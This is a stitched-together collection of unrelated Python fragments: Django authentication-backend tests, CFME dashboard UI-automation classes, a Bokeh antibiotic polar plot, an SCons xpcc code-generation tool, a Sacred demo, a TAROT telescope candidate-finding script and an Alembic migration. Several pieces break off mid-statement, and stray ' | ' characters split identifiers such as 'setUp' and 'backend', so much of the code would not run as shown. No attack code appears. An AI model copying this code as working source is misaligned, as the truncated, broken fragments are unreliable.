@override_settings(AUTHENTICATION_BACKENDS=['auth_tests.test_auth_backends.SimpleRowlevelBackend'])
class InActiveUserBackendTest(TestCase):
"""
Tests for an inactive user
"""
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user1.is_active = False
self.user1.save()
def test_has_perm(self):
self.assertEqual(self.user1.has_perm('perm', TestObj()), False)
self.assertEqual(self.user1.has_perm('inactive', TestObj()), True)
def test_has_module_perms(self):
self.assertEqual(self.user1.has_module_perms("app1"), False)
self.assertEqual(self.user1.has_module_perms("app2"), False)
class PermissionDeniedBackend(object):
"""
Always raises PermissionDenied in `authenticate`, `has_perm` and `has_module_perms`.
"""
def authenticate(self, username=None, password=None):
raise PermissionDenied
def has_perm(self, user_obj, perm, obj=None):
raise PermissionDenied
def has_module_perms(self, user_obj, app_label):
raise PermissionDenied
class PermissionDeniedBackendTest(TestCase):
"""
Tests that other backends are not checked once a backend raises PermissionDenied
"""
backend = 'auth_tests.test_auth_backends.PermissionDeniedBackend'
def setUp(self):
self.user1 = User.objects.create_user('test', 'test@example.com', 'test')
self.user1.save()
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_permission_denied(self):
"user is not authenticated after a backend raises permission denied #2550"
self.assertEqual(authenticate(username='test', password='test'), None)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_authenticates(self):
self.assertEqual(authenticate(username='test', password='test'), self.user1)
@modify_settings(AUTHENTICATION_BACKENDS={'prepend': backend})
def test_has_perm_denied(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), False)
self.assertIs(self.user1.has_module_perms('auth'), False)
@modify_settings(AUTHENTICATION_BACKENDS={'append': backend})
def test_has_perm(self):
content_type = ContentType.objects.get_for_model(Group)
perm = Permission.objects.create(name='test', content_type=content_type, codename='test')
self.user1.user_permissions.add(perm)
self.assertIs(self.user1.has_perm('auth.test'), True)
self.assertIs(self.user1.has_module_perms('auth'), True)
class NewModelBackend(ModelBackend):
pass
class ChangedBackendSettingsTest(TestCase):
"""
Tests for changes in the settings.AUTHENTICATION_BACKENDS
"""
backend = 'auth_tests.test_auth_backends.NewModelBackend'
TEST_USERNAME = 'test_user'
TEST_PASSWORD = 'test_password'
TEST_EMAIL = 'test@example.com'
def se | tUp(self):
User.objects.create_user(self.TEST_USERNAME,
self.TEST_EMAIL,
self.TEST_PASSWORD)
@override_settings(AUTHENTICATION_BACKENDS=[bac | kend])
def test_changed_backend_settings(self):
"""
Tests that removing a backend configured in AUTHENTICATION_BACKENDS
make already logged-in users disconnect.
"""
# Get a session for the test user
self.assertTrue(self.client.login(
username=self.TEST_USERNAME,
password=self.TEST_PASSWORD)
)
# Prepare a request object
request = HttpRequest()
request.session = self.client.session
# Remove NewModelBackend
with self.settings(AUTHENTICATION_BACKENDS=[
'django.contrib.auth.backends.ModelBackend']):
# Get the user from the request
user = get_user(request)
# Assert tha |
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboards for "{}"'.format(self.context["object"].group) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group
]
)
class DashboardFormCommon(CloudIntelReportsView):
title = Text("#explorer_title_text")
basic_information = Text(".//div[@id='form_div']/h3")
name = Input(name="name")
tab_title = Input(name="description")
locked = Checkbox("locked")
sample_dashboard = Text(".//div[@id='form_widgets_div']/h3")
widgets = DashboardWidgetsPicker(
"form_widgets_div",
select_id="widget",
names_locator=".//a[starts-with(@id, 'w_')]/..",
remove_locator=".//div[contains(@title, {})]//a/i"
)
cancel_button = Button("Cancel")
class NewDash | boardView(DashboardFormCommon):
add_button = Button("Add")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Adding a new dashboard" and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboa | rds",
"All Groups",
self.context["object"].group
]
)
class EditDashboardView(DashboardFormCommon):
save_button = Button("Save")
reset_button = Button("Reset")
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class EditDefaultDashboardView(EditDashboardView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == "Editing Dashboard {}".format(self.context["object"].name) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class DashboardDetailsView(CloudIntelReportsView):
SAMPLE_DASHBOARD_ROOT = ".//div[@id='modules']"
ITEM_TITLE_LOCATOR = ".//h3[contains(@class, 'panel-title')]"
title = Text("#explorer_title_text")
name = SummaryFormItem("Basic Information", "Name")
tab_title = SummaryFormItem("Basic Information", "Tab Title")
@property
def selected_items(self):
items = []
for el in self.browser.elements(self.ITEM_TITLE_LOCATOR, self.SAMPLE_DASHBOARD_ROOT):
items.append(self.browser.text(el))
return items
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"All Groups",
self.context["object"].group,
self.context["object"].name
]
)
class DefaultDashboardDetailsView(DashboardDetailsView):
@property
def is_displayed(self):
return (
self.in_intel_reports and
self.title.text == 'Dashboard "{} ({})"'.format(
self.context["object"].title,
self.context["object"].name
) and
self.dashboards.is_opened and
self.dashboards.tree.currently_selected == [
"All Dashboards",
"{} ({})".format(self.context["object"].title, self.context["object"].name)
]
)
class Dashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "group", "title", "widgets"]
def __init__(self, name, group, title=None, locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.name = name
self.title = title
self.locked = locked
self.widgets = widgets
self._group = group
@property
def group(self):
return self._group
def create(self, cancel=False):
"""Create this Dashboard in the UI."""
view = navigate_to(self, "Add")
view.fill({
"name": self.name,
"tab_title": self.title,
"locked": self.locked,
"widgets": self.widgets
})
view.add_button.click()
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
def update(self, updates):
"""Update this Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
for attr, value in updates.items():
setattr(self, attr, value)
view = self.create_view(DashboardDetailsView)
assert view.is_displayed
view.flash.assert_no_error()
if changed:
view.flash.assert_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
def delete(self, cancel=False):
"""Delete this Dashboard in the UI.
Args:
cancel: Whether to cancel the deletion (default False).
"""
view = navigate_to(self, "Details")
view.configuration.item_select(
"Delete this Dashboard from the Database",
handle_alert=not cancel
)
if cancel:
assert view.is_displayed
view.flash.assert_no_error()
else:
view = self.create_view(DashboardAllGroupsView)
assert view.is_displayed
view.flash.assert_no_error()
class DefaultDashboard(Updateable, Pretty, Navigatable):
pretty_attrs = ["name", "title", "widgets"]
def __init__(self, title="Default Dashboard", locked=None, widgets=None, appliance=None):
Navigatable.__init__(self, appliance)
self.title = title
self.locked = locked
self.widgets = widgets
@property
def name(self):
"""Name of Default Dashboard cannot be changed."""
return "default"
def update(self, updates):
"""Update Default Dashboard in the UI.
Args:
updates: Provided by update() context manager.
"""
view = navigate_to(self, "Edit")
changed = view.fill(updates)
if changed:
view.save_button.click()
else:
view.cancel_button.click()
view = self.create_view(DefaultDashboardDetailsView)
assert view.is_displayed
if changed:
view.flash.assert_success_message('Dashboard "{}" was saved'.format(self.name))
else:
view.flash.assert_success_message(
'Edit of Dashboard "{}" was cancelled by the user'.format(self.name))
@navigator.register(Dashboard, "Add")
class DashboardNew(CFMENavigateStep):
VIEW = NewDashboardView
prerequisite = NavigateToAttribute("appliance.server", "CloudIntelReports")
def step(self):
self.prerequisite_view.dashboards.tree.click_path(
"All Dashboards",
"All Groups",
self.obj.group
)
self.prerequisite_view.configuration.item_select("Ad |
# The plot server must be running
# Go to http://localhost:5006/bokeh to view this plot
from collections import OrderedDict
from math import log, sqrt
import numpy as np
import pandas as pd
from six.moves import cStringIO as StringIO
from bokeh.plotting import figure, show, output_server
antibiotics = """
bacteria, penicillin, streptomycin, neomycin, gram
Mycobacterium tuberculosis, 800, 5, 2, negative
Salmonella schottmuelleri, 10, 0.8, 0.09, negative
Proteus vulgaris, 3, 0.1, 0.1, negative
Klebsiella pneumoniae, 850, 1.2, 1, negative
Brucella abortus, 1, 2, 0.02, negative
Pseudomonas aeruginosa, 850, 2, 0.4, negative
Escherichia coli, 100, 0.4, 0.1, negative
Salmonella (Eberthella) typhosa, 1, 0.4, 0.008, negative
Aerobacter aerogenes, 870, 1, 1.6, negative
Brucella antracis, 0.001, 0.01, 0.007, positive
Streptococcus fecalis, 1, 1, 0.1, positive
Staphylococcus aureus, 0.03, 0.03, 0.001, positive
Staphylococcus albus, 0.007, 0.1, 0.001, positive
Streptococcus hemolyticus, 0.001, 14, 10, positive
Streptococcus viridans, 0.005, 10, 40, positive
Diplococcus pneumoniae, 0.005, 11, 10, positive
"""
drug_co | lor = OrderedDict([
("Penicillin", "#0d3362"),
("Streptomycin", "#c | 64737"),
("Neomycin", "black" ),
])
gram_color = {
"positive" : "#aeaeb8",
"negative" : "#e69584",
}
df = pd.read_csv(StringIO(antibiotics),
skiprows=1,
skipinitialspace=True,
engine='python')
width = 800
height = 800
inner_radius = 90
outer_radius = 300 - 10
minr = sqrt(log(.001 * 1E4))
maxr = sqrt(log(1000 * 1E4))
a = (outer_radius - inner_radius) / (minr - maxr)
b = inner_radius - a * maxr
def rad(mic):
return a * np.sqrt(np.log(mic * 1E4)) + b
big_angle = 2.0 * np.pi / (len(df) + 1)
small_angle = big_angle / 7
x = np.zeros(len(df))
y = np.zeros(len(df))
output_server("burtin")
p = figure(plot_width=width, plot_height=height, title="",
x_axis_type=None, y_axis_type=None,
x_range=[-420, 420], y_range=[-420, 420],
min_border=0, outline_line_color="black",
background_fill="#f0e1d2", border_fill="#f0e1d2")
p.line(x+1, y+1, alpha=0)
# annular wedges
angles = np.pi/2 - big_angle/2 - df.index.to_series()*big_angle
colors = [gram_color[gram] for gram in df.gram]
p.annular_wedge(
x, y, inner_radius, outer_radius, -big_angle+angles, angles, color=colors,
)
# small wedges
p.annular_wedge(x, y, inner_radius, rad(df.penicillin),
-big_angle+angles+5*small_angle, -big_angle+angles+6*small_angle,
color=drug_color['Penicillin'])
p.annular_wedge(x, y, inner_radius, rad(df.streptomycin),
-big_angle+angles+3*small_angle, -big_angle+angles+4*small_angle,
color=drug_color['Streptomycin'])
p.annular_wedge(x, y, inner_radius, rad(df.neomycin),
-big_angle+angles+1*small_angle, -big_angle+angles+2*small_angle,
color=drug_color['Neomycin'])
# circular axes and lables
labels = np.power(10.0, np.arange(-3, 4))
radii = a * np.sqrt(np.log(labels * 1E4)) + b
p.circle(x, y, radius=radii, fill_color=None, line_color="white")
p.text(x[:-1], radii[:-1], [str(r) for r in labels[:-1]],
text_font_size="8pt", text_align="center", text_baseline="middle")
# radial axes
p.annular_wedge(x, y, inner_radius-10, outer_radius+10,
-big_angle+angles, -big_angle+angles, color="black")
# bacteria labels
xr = radii[0]*np.cos(np.array(-big_angle/2 + angles))
yr = radii[0]*np.sin(np.array(-big_angle/2 + angles))
label_angle=np.array(-big_angle/2+angles)
label_angle[label_angle < -np.pi/2] += np.pi # easier to read labels on the left side
p.text(xr, yr, df.bacteria, angle=label_angle,
text_font_size="9pt", text_align="center", text_baseline="middle")
# OK, these hand drawn legends are pretty clunky, will be improved in future release
p.circle([-40, -40], [-370, -390], color=list(gram_color.values()), radius=5)
p.text([-30, -30], [-370, -390], text=["Gram-" + gr for gr in gram_color.keys()],
text_font_size="7pt", text_align="left", text_baseline="middle")
p.rect([-40, -40, -40], [18, 0, -18], width=30, height=13,
color=list(drug_color.values()))
p.text([-15, -15, -15], [18, 0, -18], text=list(drug_color.keys()),
text_font_size="9pt", text_align="left", text_baseline="middle")
p.xgrid.grid_line_color = None
p.ygrid.grid_line_color = None
show(p)
|
#!/usr/bin/env python
#
# Copyright (c) 2009, Roboterclub Aachen e.V.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or witho | ut
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the Roboterclub Aachen e.V. | nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY ROBOTERCLUB AACHEN E.V. ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ROBOTERCLUB AACHEN E.V. BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import re
import SCons
import SCons.Errors
# TODO make this more robust against whitespace etc.
includeExpression = re.compile(r'<include>(\S+)</include>', re.M)
# -----------------------------------------------------------------------------
def find_includes(env, file, include_path):
""" Find include directives in an XML file """
files = []
line_count = 0
for line in open(file).readlines():
line_count = line_count + 1
match = includeExpression.search(line)
if match:
filename = match.group(1)
relative_to_file = os.path.join(os.path.dirname(os.path.abspath(file)), filename)
relative_to_include_path = os.path.join(include_path, filename)
# 1.) include file name can be absolut
if os.path.isabs(filename):
files.append(filename)
# 2.) it could be a path relative to the files path
# this works just like #include "{filename}" in C/C++
elif os.path.isfile(relative_to_file):
files.append(relative_to_file)
# 3.) it could be a path relative to the include path
elif os.path.isfile(relative_to_include_path):
files.append(relative_to_include_path)
# 4.) Error!
else:
env.Error("Could not find include file '%s' in '%s:%s'" % (filename, file, line_count))
return files
def xml_include_scanner(node, env, path, arg=None):
""" Generates the dependencies for the XML files """
abspath, targetFilename = os.path.split(node.get_abspath())
stack = [targetFilename]
dependencies = [targetFilename]
while stack:
nextFile = stack.pop()
files = find_includes(env, os.path.join(abspath, nextFile), abspath)
for file in files:
if file not in dependencies:
stack.append(file)
dependencies.extend(files)
dependencies.remove(targetFilename)
return dependencies
# -----------------------------------------------------------------------------
def packet_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "packets.cpp"),
os.path.join(path, "packets.hpp")]
return (target, source)
def identifier_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "identifier.hpp")]
return (target, source)
def postman_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "postman.cpp"),
os.path.join(path, "postman.hpp")]
return (target, source)
def communication_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "communication.hpp")]
return (target, source)
def xpcc_task_caller_emitter(target, source, env):
try:
path = env['path']
except KeyError:
path = '.'
target = [os.path.join(path, "caller.hpp")]
return (target, source)
# -----------------------------------------------------------------------------
def generate(env, **kw):
env.SetDefault(XPCC_SYSTEM_DESIGN_SCANNERS = {})
env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'] = SCons.Script.Scanner(
function = xml_include_scanner,
skeys = ['.xml'])
env['BUILDERS']['SystemCppPackets'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_packets.py" ' \
'--source_path ${TARGETS[0].dir} ' \
'--header_path ${TARGETS[1].dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_PACKETS_COMSTR"),
emitter = packet_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppIdentifier'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_identifier.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_IDENTIFIER_COMSTR"),
emitter = identifier_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppPostman'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_postman.py" ' \
'--container "${container}" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_POSTMAN_COMSTR"),
emitter = postman_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppCommunication'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_communication.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_COMMUNICATION_COMSTR"),
emitter = communication_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
env['BUILDERS']['SystemCppXpccTaskCaller'] = \
SCons.Script.Builder(
action = SCons.Action.Action(
'python "${XPCC_SYSTEM_BUILDER}/cpp_xpcc_task_caller.py" ' \
'--outpath ${TARGET.dir} ' \
'--dtdpath "${dtdPath}" ' \
'--namespace "${namespace}" ' \
'$SOURCE',
cmdstr="$SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR"),
emitter = xpcc_task_caller_emitter,
source_scanner = env['XPCC_SYSTEM_DESIGN_SCANNERS']['XML'],
single_source = True,
target_factory = env.fs.Entry,
src_suffix = ".xml")
if SCons.Script.ARGUMENTS.get('verbose') != '1':
env['SYSTEM_CPP_PACKETS_COMSTR'] = "Generate packets from: $SOURCE"
env['SYSTEM_CPP_IDENTIFIER_COMSTR'] = "Generate identifier from: $SOURCE"
env['SYSTEM_CPP_POSTMAN_COMSTR'] = "Generate postman from: $SOURCE"
env['SYSTEM_CPP_COMMUNICATION_COMSTR'] = "Generate communication stubs from: $SOURCE"
env['SYSTEM_CPP_XPCC_TASK_CALLER_COMSTR'] = "Generate xpcc task callers from: $SOURCE"
def exists(env):
return True
|
from sacred import Experiment
ex = | Experiment('my_commands')
@ex.config
def cfg():
name = 'kyle'
@ex.command
def greet(name):
print('Hello {}! Nice to greet you!'.format(name))
@ex.command
def shout():
print('WHAZZZUUUUUUUUUUP!!!????')
@ex.automain
def main():
print('This is just the main command. Try greet or shou | t.') |
# -*- coding: utf-8 -*-
"""
Created on Thu Jul 7 14:53:55 2016
@author: nu
"""
import numpy as np
import timeit, os, sys
from astropy.coordinates import SkyCoord
from astropy.table import Column
from astroquery.vizier import Vizier
from astropy import units as u
from TAROT_PL import TarotPIP
from Filter_data import (reoffset, Lsep_candi, tbmagnitude, XYlimit, W_to_P)
#from Data_graph import candidateplot
from renametxt import Renametxt
""" This algorithm will run a file at a time by in put directly """
start = timeit.default_timer()
#start import file
input_fits = raw_input("Please put FITS [/path_file/file.fits]: "); fitsfile = Renametxt(input_fits)
savefolder = '/home/tarot/Documents/Data_Output/' # where to keep file, change where you want here
if not os.path.exists(savefolder):
savefolder = '/tmp/'
print("Output is at %s" %savefolder)
#Use algorithm from TarotPip
""" SExdata is data extract by Sextractor which keep in 'output.cat'
Catalog is obtain from USNO-B1.0 and store in Table format
Ccata is the coordinate of catalog in SkyCoord [RA, DEC]
Cdata is the coordinate of object from image in SkyCoord [RA, DEC]"""
TAROT_data = TarotPIP(fitsfile); TAROT_data.fitsfileinfo();
try:
SExdata, Catalog, Ccata, Cdata = TAROT_data.readData()
except(ValueError, IOError):
print("%s: check data table, catalog\n"%TAROT_data.image)
sys.exit(0)
#hdu = fits.open(fitsfile); tbdata = hdu[0].data; hdu.close();
""" Start to math by using 'match_to_catalog_sky' import from 'Astropy'
idx is the index of object in catalog that math with Cdata
d2d is the angular separation between Ccata and Cdata in degree
d3d is 3 dimension distace [we don't use it
matches are the closest Ccata with Cdata in SkyCoord [RA, DEC]"""
try:
idx, d2d, d3d, matches = TAROT_data.Data_match_catalog()
except (ValueError, IOError):
print("\n Matching error !!!, check 'Data_match_catalog function'")
sys.exit(1)
#Calibration data with catalog
""" Calibration the object in image to catalog and then re-matching again
idx, d2d, matches are the same meaning but value and coordinate may change
Cdata_offset is the new SkyCoord of Cdata after calibration (or off-set)"""
try:
idx, d2d, d3d, matches, Cdata_offset = reoffset(d2d, matches, Cdata, Ccata)
except (ValueError, IOError):
print("\n offset coordinate error !!!, check 'reoffset function'")
sys.exit(2)
# Sellect candidate from high angular distance (assume it is new object in field)
""" idx_candi_catalog is the idx for catalog
idx_candi_data is the idx for data [Cation there are two data's SkyCoord]"""
try:
idx_candi_catalog, idx_candi_data = Lsep_candi(3, idx, d2d, SExdata) #10*std of d2d
except(ValueError, IOError):
print("\n Candidate sellected error !!!, check 'Lsep_candi function'")
sys.exit(3)
#cut candidate near the edge of image
try:
XYcandi, idx_XYcandi_data, idx_XYcandi_cata = XYlimit(Cdata_offset,idx_candi_data, idx_candi_catalog, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\nProblem with limit candidate in the edge !!!, check 'idx_XYcandi_cata' function")
sys.exit(4)
#convert world to pixel
try:
Catalog_WTP, Matches_WTP, Cdata_offset_WTP = W_to_P(Ccata, Cdata_offset, matches, TAROT_data.new_wcs)
except(ValueError, IOError):
print("\n Convert wcs error!!!, check 'W_to_P function'")
sys.exit(5)
#Sellect candidate by local angular separation (among 10 objects that next to each other)
""" d2d_candi is in dagree, the candidate sellected by using the angular separation
Cdata_candi, Ccata_candi are the SkyCoord [RA, DEC] of candidate
for data(off-set) and catalog, repectively but
cata_candi is the information of candidate in catalog (all info. available)"""
#d2d_candi = d2d[idx_candi_data]
Cdata_candi = Cdata_offset[idx_XYcandi_data]
cata_candi = Catalog[idx_XYcandi_cata]
Ccata_candi = Ccata[idx_XYcandi_cata]
#Magnitude comparison and sellection
""" There is mismatch between magnitude of data and catalog """
tbmag = tbmagnitude(idx, SExdata, Catalog)
Cdata_col_ra = Column(Cdata_offset.ra, name='ra')
Cdata_col_dec = Column(Cdata_offset.dec, name='dec')
Ang_sept_candidate = Column((d2d.arcsec*u.arcsec), name='Separation')
tbmag.add_column(Cdata_col_ra,index=None)
tbmag.add_column(Cdata_col_dec,index=None)
tbmag.add_column(Ang_sept_candidate,index=None)
Candi_d2d = tbmag[idx_XYcandi_data]
""" Candidate can be create in a tables,
by angular distance (d2d), in ASCII or HTML file
"""
#HTML
#savename_html = os.path.join(savefolder, TAROT_data.fname + 'html_d2d_candidate.dat')
#Candi_d2d.write(savename_html, format='ascii.html')
#ASCII
#savename_ascii = os.paht.join(savefolder, TAROT_data.fname + 'ascii_d2d_candidate.dat')
#Candi_d2d.write(savename_ascii, format='ascii')
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
print('\nMedain of separation : STD %3.2f\" : %3.2f\"\n' %(np.median(d2d.arcsec), np.std(d2d.arcsec)))
print('Number of candidate\t\t:%d\n' %len(Candi_d2d))
print('-----------------------------------------------------------------\n')
print Candi_d2d
print("\n")
line0_reg_ds9 = "global color=green dashlist=8 3 width=1 font=\"helvetica 10 normal roman\" select=1 highlite=1 dash=0 fixed=0 edit=1 move=1 delete=1 include=1 source=1\n"
line1_reg_ds9 = "icrs\n"
Candi_reg = open("/tmp/Candi_region_Gaia.reg", 'w')
Candi_reg.write(line0_reg_ds9)
Candi_reg.write(line1_reg_ds9)
for i in range(len(Candi_d2d)):
Candi_reg.write("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}\n" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
Candi_reg.close()
#print("circle(%f, %f, 16.0\") # color=red text={Gaia_%d}" %(Candi_d2d["ra"][i], Candi_d2d["dec"][i], i))
print("\n")
print(':::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::')
#Filter candidate by checking with catalog USNO and NOMAD1
confirm_1 = []; confirm_2 = [];
confirm_candi_0 = []; confirm_candi_1 = []; confirm_candi_2 = [];
for i in range(len(Cdata_candi)):
confirm_candi_1 = Vizier(catalog="USNO-B1.0", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_1:
confirm_1.append(i)
for i in range(len(Cdata_candi)):
confirm_candi_2 = Vizier(catalog="NOMAD1", row_limit=-1).query_region(Cdata_candi[i], radius=10*u.arcsec, verbose=False)
if not confirm_candi_2:
confirm_2.append(i)
# Write candidate to disk
savename_ascii = os.path.join(savefolder,TAROT_data.fname + '.candi.dat')
info_candi_1 = Candi_d2d[confirm_1]
info_candi_1.write(savename_ascii, format='ascii') # Candidate after check with USNO-B1.0 and write to disk
info_candi_2 = Candi_d2d[confirm_2]
print("\n::::::::::::::::::::::: Potential candidate check with USNO-B1.0 :::::::::::::::::::::\n")
try:
print(info_candi_1)
print("\n")
Candi_reg1 = open("/tmp/Candi_region_USNO.txt", 'w')
Candi_reg1.write(line0_reg_ds9)
Candi_reg1.write(line1_reg_ds9)
for i in range(len(info_candi_1)):
Candi_reg1.write("circle(%f, %f, 16.0\") # color=blue text={USNO_%d}\n" %(info_candi_1["ra"][i], info_candi_1["dec"][i], i))
Candi_reg1.close()
print("Number of Candidate %d" %len(info_candi_1))
print("\n"*2)
except(ValueError, NameError):
print("No candidate in USNO-B1.0\n\n")
print("\n::::::::::::::::::::::: Potential candidate check with NOMAD1 :::::::::::::::::::::\n")
try:
print(info_candi_2)
print("\n")
Candi_reg2 = open("/tmp/Candi_region_NOMAD1.txt", 'w')
Candi_reg2.write(line0_reg_ds9)
Candi_reg2.write(line1_reg_ds9)
for i in range(len(info_candi_2)):
Candi_reg2.write("circle(%f, %f, 16.0\") # color=green text={NOMAD1_%d}\n" %(info_candi_2["ra"][i], info_candi_2["dec"][i], i))
Candi_reg2.close()
print("Number of Candidate %d" %len(info_candi_2))
print("\n"*2)
except(ValueError, NameError):
print("No c | andidate in NOMAD1\n\n")
stop = timeit.default_timer()
runtime = stop - start
print("\nRuntime = %2.2f" %runtime)
#graph0 = candidateplot(TAROT_data.tbdata,XYcandi['Xpix'],XYcandi['Ypix'], 'Candidate by angula | r separation')
|
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
def upgrade():
if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
else:
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.String(255)
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.String(255)
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.String(1024)
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.String(1024)
)
op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.Text()
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.Text()
)
